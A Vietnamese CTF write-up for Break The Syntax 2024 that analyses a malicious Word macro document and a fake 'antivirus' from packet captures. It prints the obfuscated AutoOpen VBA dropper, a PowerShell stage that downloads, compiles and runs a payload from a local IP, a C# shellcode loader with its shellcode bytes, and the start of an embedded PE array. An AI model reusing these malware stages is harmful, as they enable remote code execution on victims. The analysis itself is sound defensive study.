
Break The Syntax 2024

Challenge được lưu -> tại đây

Free_flag

Description

I think someone just logged in to my computer

Solution

  • Bài này cho ta 1 file pcapng.
  • Mở nó lên với wireshark. Thứ đập vào mắt ta đầu tiên là 1 file docm chứa macro.

  • image
  • Export nó về và dùng olevba để kiểm tra, ta được 1 đoạn macro đã bị làm rối (obfuscated)
' Decoder routine of the macro (identifiers kept exactly as olevba extracted them).
' Each input byte is XORed with one byte of a repeating 4-byte key and with the constant &HBB.
' Parameter: lXKWfCUl1zmltYi - the encoded bytes.
' Returns:   a new byte array holding the decoded bytes.
Function XUX8BlCUMq5KoK8(lXKWfCUl1zmltYi() As Byte) As Byte()
    Dim EMtQJsAKYNXvFOd() As Byte
    ReDim EMtQJsAKYNXvFOd(UBound(lXKWfCUl1zmltYi))
    ' Key bytes 222,173,190,239 are &HDE,&HAD,&HBE,&HEF.
    ' The array is declared with upper bound 4, but only indexes 0..3 are set and read (Mod 4 below).
    Dim nF7o4G7ab45k7fe(4) As Byte
    nF7o4G7ab45k7fe(0) = 222
    nF7o4G7ab45k7fe(1) = 173
    nF7o4G7ab45k7fe(2) = 190
    nF7o4G7ab45k7fe(3) = 239
    Dim HSnocyKymDfeVtw As Long
    For HSnocyKymDfeVtw = LBound(lXKWfCUl1zmltYi) To UBound(lXKWfCUl1zmltYi)
        ' decoded = encoded Xor key(position Mod 4) Xor &HBB
        EMtQJsAKYNXvFOd(HSnocyKymDfeVtw) = lXKWfCUl1zmltYi(HSnocyKymDfeVtw) Xor nF7o4G7ab45k7fe(HSnocyKymDfeVtw Mod 4) Xor &HBB
    Next HSnocyKymDfeVtw
    XUX8BlCUMq5KoK8 = EMtQJsAKYNXvFOd
End Function

' Parses a comma-separated list of numbers into a byte array.
' Parameter: str - text such as "12, 34, 56"; each item is trimmed and converted with CByte.
' Returns:   a byte array with one element per comma-separated item.
Function BBjijsT7pS60iwZ(str As String) As Byte()
    Dim nrKM9I07nhiFKOO() As String
    Dim GHebfca2sCJaoCG() As Byte
    Dim vgrs5jtmF1aXSJF As Long
    nrKM9I07nhiFKOO = Split(str, ",")
    ' The result array uses the same bounds as the array returned by Split.
    ReDim GHebfca2sCJaoCG(LBound(nrKM9I07nhiFKOO) To UBound(nrKM9I07nhiFKOO))
    For vgrs5jtmF1aXSJF = LBound(nrKM9I07nhiFKOO) To UBound(nrKM9I07nhiFKOO)
        GHebfca2sCJaoCG(vgrs5jtmF1aXSJF) = CByte(Trim(nrKM9I07nhiFKOO(vgrs5jtmF1aXSJF)))
    Next vgrs5jtmF1aXSJF

    BBjijsT7pS60iwZ = GHebfca2sCJaoCG
End Function

' Entry point of the macro: Word runs a macro named AutoOpen when the document is opened.
' It reads the alternative text of the first inline shape, decodes it into a command string
' and runs that string through WScript.Shell.
' For triage, the combination to look for is: AutoOpen + CreateObject("WScript.Shell") + a payload
' stored outside the VBA source (here, in the shape's alternative text).
Sub AutoOpen()
Dim TP2lyf5wJk5RfdK As InlineShape
Set TP2lyf5wJk5RfdK = ActiveDocument.InlineShapes(1)
Dim ovVApsD7tsHJaAV() As Byte
' BBjijsT7pS60iwZ splits the alternative text on commas and converts each item to a byte.
ovVApsD7tsHJaAV = BBjijsT7pS60iwZ(TP2lyf5wJk5RfdK.AlternativeText)
' XUX8BlCUMq5KoK8 is the XOR decoder; KKPSYRKShOsPgGt has no Dim statement in this listing.
KKPSYRKShOsPgGt = XUX8BlCUMq5KoK8(ovVApsD7tsHJaAV)
Dim txsptBa4S5TwPSY As String
' Convert the decoded bytes into a string.
txsptBa4S5TwPSY = StrConv(KKPSYRKShOsPgGt, vbUnicode)
Dim o4LCufGQYESakcZ As Object
Set o4LCufGQYESakcZ = CreateObject("WScript.Shell")
' Run arguments: window style 0 (hidden window) and True (wait until the command returns).
o4LCufGQYESakcZ.Run txsptBa4S5TwPSY, 0, True
' Shown only after the command has returned; this string is a decoy, not the flag the write-up ends with.
MsgBox "BtSCTF{LEGIT_FREE_FLAG_OMG}"
End Sub
  • Sử dụng AI để sửa các biến lại cho dễ đọc
' Renamed copy of the macro's decoder, kept as a reading aid.
' Each input byte is XORed with one byte of a repeating 4-byte key and with the constant &HBB.
' Parameter: inputArray - the encoded bytes.
' Returns:   a new byte array holding the decoded bytes.
Function DecodeByteArray(inputArray() As Byte) As Byte()
    Dim decodedArray() As Byte
    ReDim decodedArray(UBound(inputArray))
    ' Key bytes 222,173,190,239 are &HDE,&HAD,&HBE,&HEF.
    ' Declared with upper bound 4, but only indexes 0..3 are set and read (i Mod 4 below).
    Dim xorKey(4) As Byte
    xorKey(0) = 222
    xorKey(1) = 173
    xorKey(2) = 190
    xorKey(3) = 239
    Dim i As Long
    For i = LBound(inputArray) To UBound(inputArray)
        ' decoded = encoded Xor key(position Mod 4) Xor &HBB
        decodedArray(i) = inputArray(i) Xor xorKey(i Mod 4) Xor &HBB
    Next i
    DecodeByteArray = decodedArray
End Function

' Parses a comma-separated list of numbers into a byte array.
' Parameter: inputString - text such as "12, 34, 56"; each item is trimmed and converted with CByte.
' Returns:   a byte array with one element per comma-separated item.
Function StringToByteArray(inputString As String) As Byte()
    Dim stringArray() As String
    Dim byteArray() As Byte
    Dim i As Long
    stringArray = Split(inputString, ",")
    ' The result array uses the same bounds as the array returned by Split.
    ReDim byteArray(LBound(stringArray) To UBound(stringArray))
    For i = LBound(stringArray) To UBound(stringArray)
        byteArray(i) = CByte(Trim(stringArray(i)))
    Next i
    StringToByteArray = byteArray
End Function

' Entry point of the macro: Word runs a macro named AutoOpen when the document is opened.
' It reads the alternative text of the first inline shape, decodes it into a command string
' and runs that string through WScript.Shell.
' For triage, the combination to look for is: AutoOpen + CreateObject("WScript.Shell") + a payload
' stored outside the VBA source (here, in the shape's alternative text).
Sub AutoOpen()
    Dim image As InlineShape
    Set image = ActiveDocument.InlineShapes(1)
    Dim byteArray() As Byte
    ' The alternative text holds the payload as comma-separated byte values.
    byteArray = StringToByteArray(image.AlternativeText)
    ' decodedData has no Dim statement in this listing.
    decodedData = DecodeByteArray(byteArray)
    Dim decodedString As String
    ' Convert the decoded bytes into a string.
    decodedString = StrConv(decodedData, vbUnicode)
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    ' Run arguments: window style 0 (hidden window) and True (wait until the command returns).
    shell.Run decodedString, 0, True
    ' Shown only after the command has returned; this string is a decoy, not the flag the write-up ends with.
    MsgBox "BtSCTF{LEGIT_FREE_FLAG_OMG}"
End Sub

  • Ta có thể thấy rõ ràng rằng tập tin này đang thực thi 1 đoạn string bằng WScript.Shell
  • Thay vì phân tích mã, mình sẽ thực hiện phân tích động thông qua https://app.any.run/ để tiết kiệm thời gian
  • image
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-Command -ScriptBlock {$6gYiBaJnTQcMARy = \"192.168.56.1\";$DBFwswhgYKnCwxJ = (123974 - 152030 + 28874 + 519);$GPmlM4I7LVSUO9t = (\"{3}{1}{4}{5}{0}{2}\"-f'd5','d9','d2','d9','de','c9');$98UxWBU8aY4OJFJ = [System.Text.Encoding]::UTF8;function MB9ERVf9riNRmuw {param ([byte[]] $tjjm1xYg4zJinVI);$DXRDV3GJeE7gone = New-Object byte[] $tjjm1xYg4zJinVI.Length;$t5wJRYluj7d0ieV = 13;for ($UGDhhObqc1FJ1Vk = 0; $UGDhhObqc1FJ1Vk -lt $tjjm1xYg4zJinVI.Length;$UGDhhObqc1FJ1Vk++) {$DXRDV3GJeE7gone[$UGDhhObqc1FJ1Vk] = $tjjm1xYg4zJinVI[$UGDhhObqc1FJ1Vk] -bxor $t5wJRYluj7d0ieV;$t5wJRYluj7d0ieV = $t5wJRYluj7d0ieV -bxor 37 -bxor ($UGDhhObqc1FJ1Vk % 0xBB) };return $DXRDV3GJeE7gone};[byte[]] $FFpqmSFabhns282 = 67,58,92,87,105,110,100,111,119,115,92,77,105,99,114,111,115,111,102,116,46,78,69,84,92,70,114,97,109,101,119,111,114,107;$XqpH6qchzQzxaIl = (gci ($98UxWBU8aY4OJFJ.GetString($FFpqmSFabhns282)) -R -Fi (\"{4}{6}{1}{3}{5}{2}{0}\" -f 'e','c','x','.','c','e','s'));if ($null -eq $XqpH6qchzQzxaIl.Exists) {exit} else {$XqpH6qchzQzxaIl = $XqpH6qchzQzxaIl.FullName};$TYVxBiSN7LYP1B3 = (iwr \"${6gYiBaJnTQcMARy}:${DBFwswhgYKnCwxJ}/${GPmlM4I7LVSUO9t}\" -UseBasicParsing).Content;$TYVxBiSN7LYP1B3 = MB9ERVf9riNRmuw $TYVxBiSN7LYP1B3;$6fNCDEaFmB9lcOg = \"${Env:TEMP}\ea98cjme\";$FbPIDO60oanqD7k = \"/out:${Env:TEMP}\ea98cjme.exe\";Set-Content -Path $6fNCDEaFmB9lcOg -Value $TYVxBiSN7LYP1B3 -Encoding Byte -NoNewline;& $XqpH6qchzQzxaIl $FbPIDO60oanqD7k $6fNCDEaFmB9lcOg;& \"${Env:TEMP}\ea98cjme.exe\";rm $6fNCDEaFmB9lcOg}"
  • Nó lại bị obfuscate, ta sử dụng công cụ PowerDecode và AI để sửa lại mã cho dễ đọc (kết quả do AI sửa cần được đối chiếu lại với dòng lệnh gốc ở trên)
  • Và đây là mã đã được sửa

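# Download parameters of the second stage, as recovered from the obfuscated command line.
$serverIP = "192.168.56.1"
# Port: the original expression is 123974 - 152030 + 28874 + 519, which evaluates to 1337.
$calculatedValue = (123974 - 152030 + 28874 + 519)
# Resource name: "{3}{1}{4}{5}{0}{2}" -f 'd5','d9','d2','d9','de','c9' expands to d9d9dec9d5d2,
# the same name as the object exported from the capture.
$encodedString = 'd9d9dec9d5d2'
$encoding = [System.Text.Encoding]::UTF8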

function DecryptData {
    # Decodes the downloaded bytes with a rolling XOR key.
    # The key starts at 13; after each byte it is XORed with 37 and with (position % 0xBB).
    # Returns a byte array of the same length as the input.
    param ([byte[]] $inputData)

    $key = 13
    $plain = New-Object byte[] $inputData.Length
    $pos = 0

    while ($pos -lt $inputData.Length) {
        $plain[$pos] = $inputData[$pos] -bxor $key
        # Advance the key for the next byte.
        $key = ($key -bxor 37) -bxor ($pos % 0xBB)
        $pos++
    }

    return $plain
}

# Second stage: locate the C# compiler, download and decode a source file, compile it and run the result.
# Observable behaviour for defenders: powershell.exe starting csc.exe, and ea98cjme / ea98cjme.exe in %TEMP%.

# These bytes are the ASCII text C:\Windows\Microsoft.NET\Framework
[byte[]] $byteArray = 67,58,92,87,105,110,100,111,119,115,92,77,105,99,114,111,115,111,102,116,46,78,69,84,92,70,114,97,109,101,119,111,114,107
# Recursive search (-R) with a name filter (-Fi) for csc.exe under that directory.
$exePath = (gci ($encoding.GetString($byteArray)) -R -Fi 'csc.exe')

# Stop when no compiler was found; otherwise keep only the full path.
if ($null -eq $exePath.Exists) {
    exit 
} else {
    $exePath = $exePath.FullName
}

# NOTE(review): the original command line uses double-quoted (expandable) strings for the URL and
# the %TEMP% paths below. In this cleaned-up listing they became single-quoted, which PowerShell
# treats literally, so read them as expanded values rather than running the listing as written.
$webContent = (iwr '${serverIP}:${calculatedValue}/${encodedString}' -UseBasicParsing).Content
# The response body is decoded with the rolling-XOR routine DecryptData.
$webContent = DecryptData $webContent

$tempFilePath = '${Env:TEMP}\ea98cjme'
$outputExePath = '/out:${Env:TEMP}\ea98cjme.exe'

# Write the decoded bytes to the temp file, pass it to csc.exe with /out:, run the produced
# executable, then delete the temp input file (the .exe itself is not removed here).
Set-Content -Path $tempFilePath -Value $webContent -Encoding Byte -NoNewline
& $exePath $outputExePath $tempFilePath
& '${Env:TEMP}\ea98cjme.exe'
rm $tempFilePath

  • Đọc src ta thấy nó tải xuống 1 file từ ip và port cho sẵn, sau đó decrypt, dùng csc.exe biên dịch nội dung đó thành file exe trong %TEMP% rồi chạy.
  • Đối với file tải xuống nó đã được capture bởi file pcapng đã cho.
  • image
  • Bây giờ ta viết 1 script nhỏ để xem sau khi decrypt chúng có gì
# Offline re-implementation of the stage-2 decoder: the downloaded object exported from the
# capture is decoded with the same rolling XOR key, so the payload can be read without running it.
with open("d9d9dec9d5d2", "rb") as fh:
    blob = fh.read()

key = 13  # initial key value used by the PowerShell decoder
decoded = bytearray(len(blob))
for pos, value in enumerate(blob):
    decoded[pos] = value ^ key
    # The key changes after every byte: XOR with 37 and with the position modulo 0xBB.
    key ^= 37 ^ (pos % 0xBB)
print(decoded)
  • Và đây là đầu ra
bytearray(b'using System;\r\nusing System.Runtime.InteropServices;\r\n\r\nclass Program\r\n{\r\n    [DllImport("kernel32.dll", SetLastError = true)]\r\n    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern bool VirtualFree(IntPtr lpAddress, uint dwSize, uint dwFreeType);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);\r\n    public static void Main()\r\n    {\r\n        byte[] buf = new byte[] {0xd9,0xec,0xbb,0xe9,0xaf,0xc8,0xb5,0xd9,0x74,0x24,0xf4,0x5f,0x33,0xc9,0xb1,0x87,0x31,0x5f,0x1a,0x83,0xc7,0x04,0x03,0x5f,0x16,0xe2,0x1c,0x74,0x1b,0x6c,0xaa,0xaf,0x68,0x37,0x99,0x35,0x23,0x7f,0x43,0x05,0x8d,0x31,0xfa,0x58,0x4b,0x25,0xff,0xdc,0x44,0xca,0xda,0x99,0x3b,0x0e,0x44,0x32,0xf3,0xd7,0x32,0x5b,0xc0,0xc1,0x1b,0x73,0x18,0x67,0x3f,0xf2,0x18,0x75,0xf8,0x25,0xbc,0x04,0x61,0xf3,0xe4,0xd5,0x95,0x58,0x7f,0x02,0x31,0x14,0xe9,0xa0,0xe0,0x01,0x43,0xaa,0xb6,0xd1,0xb7,0xae,0xd4,0x58,0xdd,0xb3,0x96,0x0c,0x26,0xfc,0xb5,0xbd,0xa3,0x15,0x58,0xe2,0xf9,0x3a,0x85,0x06,0xc7,0x16,0x86,0xe6,0x06,0x7a,0x45,0x69,0x8d,0xb2,0x29,0x69,0x23,0xd9,0xac,0x22,0xaf,0x70,0x03,0x7c,0x9c,0x68,0x1d,0x5f,0x86,0x97,0xc6,0x0b,0xd7,0x30,0x2e,0xab,0x22,0x85,0x02,0xc8,0x61,0xea,0xa4,0xf8,0x8d,0x5e,0xa4,0x42,0x07,0x69,0xd6,0x8f,0x60,0x78,0x64,0x98,0xcd,0x4b,0x24,0xcc,0x31,0x7a,0xaa,0xea,0x55,0x2e,0xe1,0x5b,0xec,0x07,0x59,0x2c,0xc5,0x02,0x17,0x74,0x55,0x34,0xf7,0xf5,0xd1,0xe7,0xb5,0xa1,0x65,0x2e,0x3b,0x6b,0x9c,0xc7,0xde,0xc4,0xf3,0x63,0xd5,0x7f,0x2b,0x59,0xf3,0x34,0xdb,0x14,0xe4,0x85,0xb7,0x20,0x3d,0x5d,0xc0,0xff,0x55,0x20,0xc7,0x28,0x92,0x9f,0xe0,0x61,0x89,0xa0,0x89,0x4b,0x65,0xf6,0x8b,0xda,0xf5,0xde,0x7c
,0x87,0x14,0x55,0xf2,0xfd,0x11,0xf4,0xa5,0x1c,0x32,0x55,0xcf,0x38,0x23,0x99,0xc6,0x37,0x28,0x8d,0xfa,0x93,0xa4,0x87,0x18,0x2a,0xfc,0x36,0x65,0x1b,0xea,0x95,0x5b,0xcc,0xd7,0x33,0x4a,0x96,0x84,0x85,0x15,0x4a,0x8f,0xac,0xeb,0xe6,0x73,0x94,0xa2,0x42,0x8e,0xc8,0x85,0x1e,0x38,0x5e,0x86,0x39,0x8a,0x15,0xc9,0xdc,0x96,0xbc,0x53,0xdc,0x3a,0xda,0x3b,0x5a,0x83,0x00,0x74,0x0e,0xa5,0x58,0xf1,0x3d,0xe8,0x79,0xed,0xc0,0x1a,0xaf,0x13,0xb4,0x26,0x76,0xae,0xb5,0x1f,0x95,0x41,0x11,0x7a,0x2b,0x7a,0xcf,0x12,0xad,0x10,0x4a,0xce,0xea,0x64,0xbb,0x98,0x3e,0x28,0x40,0x55,0x2d,0x72,0x3b,0x5e,0x6c,0x75,0xaa,0xab,0x37,0x9d,0xc2,0x77,0x81,0x8e,0x0c,0x96,0x4c,0xde,0x30,0xaf,0x1b,0xa9,0x78,0xee,0x3e,0xca,0x55,0x52,0x05,0x10,0x01,0xe2,0xad,0x8e,0x0a,0xee,0x15,0x57,0xa3,0xb3,0x1a,0x5d,0xec,0x6a,0x31,0x28,0x68,0x7a,0x1f,0x77,0x96,0xac,0x33,0x5a,0xcd,0x5b,0x23,0x83,0xb0,0xba,0x18,0xed,0xa8,0x26,0xe8,0x93,0x09,0x46,0x22,0xaf,0x11,0x90,0xe9,0xf1,0xaf,0xf9,0x79,0x1b,0x2e,0xd6,0x5d,0x22,0xa8,0x50,0x1f,0x54,0x0e,0x87,0x63,0x7e,0x3d,0xe6,0x3f,0x6b,0xe6,0xff,0x67,0xe6,0x02,0x85,0xca,0x27,0xe9,0xe0,0xe3,0xd8,0x76,0xcb,0x8f,0x5b,0xe2,0xbb,0x88,0x05,0xce,0xb2,0xed,0xfb,0xea,0x5f,0x7c,0x5a,0x71,0x31,0x25,0xac,0x42,0x6f,0x1f,0xdb,0x9b,0x34,0x43,0x58,0x2b,0xd8,0x32,0x2c,0x20,0x45,0x4f,0x9e,0xc4,0x54,0xe4,0xe7,0xee,0x8b,0xab,0x98,0xef,0x06,0x4d,0x12,0x90,0xb4,0xb7,0xc0,0x81,0x68,0x83,0xdb,0x07,0x0c,0x00,0x10,0x8e,0x3c,0x48,0xd0,0x07,0xb2,0x78,0x72,0x92,0x76,0x65,0x64,0x24,0x78,0xa8,0x8a,0xf8,0x52,0x7d,0xff,0x43,0xdd,0x7f,0xb6,0x20,0xd2,0xac,0xa8,0xd6,0x30,0xfe,0x5d,0x51,0xf5,0x21,0x34,0x5b,0xab,0xfc,0xd9,0x43,0x5d,0xb2,0x79,0x0c,0xa8,0xc6,0x5c,0xc3,0x39,0xef,0x3a,0xb7};\r\n        IntPtr allocMemAddress = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x1000 | 0x2000, 0x40);\r\n        Marshal.Copy(buf, 0, allocMemAddress, buf.Length);\r\n        uint threadId;\r\n        IntPtr hThread = CreateThread(IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, out threadId);\r\n        WaitForSingleObject(hThread, 
0xFFFFFFFF);\r\n    }\r\n}')
  • Tuy dữ liệu được in ra ở dạng byte nhưng ta vẫn đọc được: đây là mã nguồn C# cấp phát vùng nhớ bằng VirtualAlloc (quyền 0x40, tức đọc/ghi/thực thi), chép shellcode từ mảng byte hex vào đó rồi chạy bằng CreateThread.
  • Bây giờ ta tiến hành lấy file shellcode ra và debug bằng công cụ scdbg
  • image
  • image

Flag : BtSCTF{VbA_+P0wer5h3ll=_<3!!!}

BTS_Antivirus

Description

I realised that something was wrong with that free flag document, so I decided to download an antivirus. It worked well - maybe too well, because it seems to have encrypted all my files. I don’t really know how to feel about that - maybe it’s for security. I’ve captured internet traffic and created a memory dump of the antivirus process. Can you analyze what it really did?

Solution

  • Bài này cho ta 2 file: 1 file pcapng và 1 file DMP được dump từ tiến trình đang chạy.
  • Ta tiến hành phân tích file pcapng trước
  • image
  • Ở đây, ta thấy có 1 file powershell được truyền qua mạng.
  • Bây giờ ta xem src nó xem có gì
$sb = { [byte[]] $data = 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4c,0x01,0x03,0x00,0x94,0xea,0xe8,0xa9,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x22,0x20,0x0b,0x01,0x30,0x00,0x00,0x16,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x1a,0x34,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x20,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x60,0x85,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc8,0x33,0x00,0x00,0x4f,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x70,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x0c,0x00,0x00,0x00,0xec,0x32,0x00,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x20,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x20,0x14,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x16,0x00,
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x2e,0x72,0x73,0x72,0x63,0x00,0x00,0x00,0x70,0x03,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x02,0x00,0x05,0x00,0xa8,0x23,0x00,0x00,0x44,0x0f,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1b,0x30,0x03,0x00,0x42,0x00,0x00,0x00,0x01,0x00,0x00,0x11,0x00,0x73,0x0f,0x00,0x00,0x0a,0x0a,0x06,0x03,0x17,0x73,0x10,0x00,0x00,0x0a,0x0b,0x07,0x73,0x11,0x00,0x00,0x0a,0x0c,0x08,0x02,0x6f,0x12,0x00,0x00,0x0a,0x00,0xde,0x0b,0x08,0x2c,0x07,0x08,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x06,0x6f,0x14,0x00,0x00,0x0a,0x0d,0xde,0x0b,0x07,0x2c,0x07,0x07,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2a,0x00,0x00,0x01,0x1c,0x00,0x00,0x02,0x00,0x17,0x00,0x0a,0x21,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,0x00,0x10,0x00,0x25,0x35,0x00,0x0b,0x00,0x00,0x00,0x00,0x1b,0x30,0x03,0x00,0x39,0x00,0x00,0x00,0x02,0x00,0x00,0x11,0x00,0x02,0x73,0x15,0x00,0x00,0x0a,0x0a,0x06,0x03,0x16,0x73,0x10,0x00,0x00,0x0a,0x0b,0x07,0x73,0x16,0x00,0x00,0x0a,0x0c,0x08,0x6f,0x17,0x00,0x00,0x0a,0x0d,0xde,0x16,0x08,0x2c,0x07,0x08,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x07,0x2c,0x07,0x07,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2a,0x00,0x00,0x00,0x01,0x1c,0x00,0x00,0x02,0x00,0x18,0x00,0x09,0x21,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,0x00,0x11,0x00,0x1b,0x2c,0x00,
0x0b,0x00,0x00,0x00,0x00,0x1b,0x30,0x05,0x00,0x67,0x01,0x00,0x00,0x03,0x00,0x00,0x11,0x00,0x28,0x18,0x00,0x00,0x0a,0x0a,0x7e,0x02,0x00,0x00,0x04,0x25,0x2d,0x17,0x26,0x7e,0x01,0x00,0x00,0x04,0xfe,0x06,0x08,0x00,0x00,0x06,0x73,0x19,0x00,0x00,0x0a,0x25,0x80,0x02,0x00,0x00,0x04,0x28,0x1a,0x00,0x00,0x0a,0x00,0x06,0x73,0x1b,0x00,0x00,0x0a,0x72,0x01,0x00,0x00,0x70,0x28,0x1c,0x00,0x00,0x0a,0x6f,0x1d,0x00,0x00,0x0a,0x00,0x06,0x28,0x1e,0x00,0x00,0x0a,0x72,0x45,0x00,0x00,0x70,0x6f,0x1f,0x00,0x00,0x0a,0x6f,0x20,0x00,0x00,0x0a,0x00,0x06,0x17,0x6f,0x21,0x00,0x00,0x0a,0x00,0x06,0x06,0x6f,0x22,0x00,0x00,0x0a,0x06,0x6f,0x23,0x00,0x00,0x0a,0x6f,0x24,0x00,0x00,0x0a,0x0b,0x06,0x06,0x6f,0x22,0x00,0x00,0x0a,0x06,0x6f,0x23,0x00,0x00,0x0a,0x6f,0x25,0x00,0x00,0x0a,0x0c,0x72,0x67,0x00,0x00,0x70,0x20,0xb8,0x22,0x00,0x00,0x73,0x26,0x00,0x00,0x0a,0x0d,0x09,0x6f,0x27,0x00,0x00,0x0a,0x13,0x04,0x20,0x00,0x10,0x00,0x00,0x8d,0x29,0x00,0x00,0x01,0x13,0x05,0x00,0x2b,0x63,0x00,0x11,0x04,0x11,0x05,0x16,0x11,0x05,0x8e,0x69,0x6f,0x28,0x00,0x00,0x0a,0x13,0x06,0x11,0x05,0x11,0x06,0x28,0x01,0x00,0x00,0x2b,0x28,0x02,0x00,0x00,0x2b,0x08,0x28,0x02,0x00,0x00,0x06,0x13,0x07,0x11,0x07,0x28,0x04,0x00,0x00,0x06,0x13,0x08,0x11,0x08,0x07,0x28,0x01,0x00,0x00,0x06,0x13,0x09,0x11,0x09,0x8e,0x69,0x28,0x2b,0x00,0x00,0x0a,0x13,0x0a,0x11,0x04,0x11,0x0a,0x11,0x09,0x28,0x03,0x00,0x00,0x2b,0x28,0x02,0x00,0x00,0x2b,0x16,0x11,0x09,0x8e,0x69,0x1a,0x58,0x6f,0x2d,0x00,0x00,0x0a,0x00,0x00,0x17,0x13,0x0b,0x2b,0x98,0x13,0x0c,0x00,0x11,0x04,0x28,0x1e,0x00,0x00,0x0a,0x11,0x0c,0x6f,0x2e,0x00,0x00,0x0a,0x6f,0x1f,0x00,0x00,0x0a,0x16,0x11,0x0c,0x6f,0x2e,0x00,0x00,0x0a,0x6f,0x2f,0x00,0x00,0x0a,0x6f,0x2d,0x00,0x00,0x0a,0x00,0x00,0xde,0x00,0xde,0x23,0x11,0x04,0x2c,0x08,0x11,0x04,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2c,0x07,0x09,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x06,0x2c,0x07,0x06,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x2a,0x00,0x41,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0xaa,0x00,0x00,0x00,0x6b,0x00,0x00,0x00,0x15,0x01,0x00,0x00,0x2c,0x00,0x00,
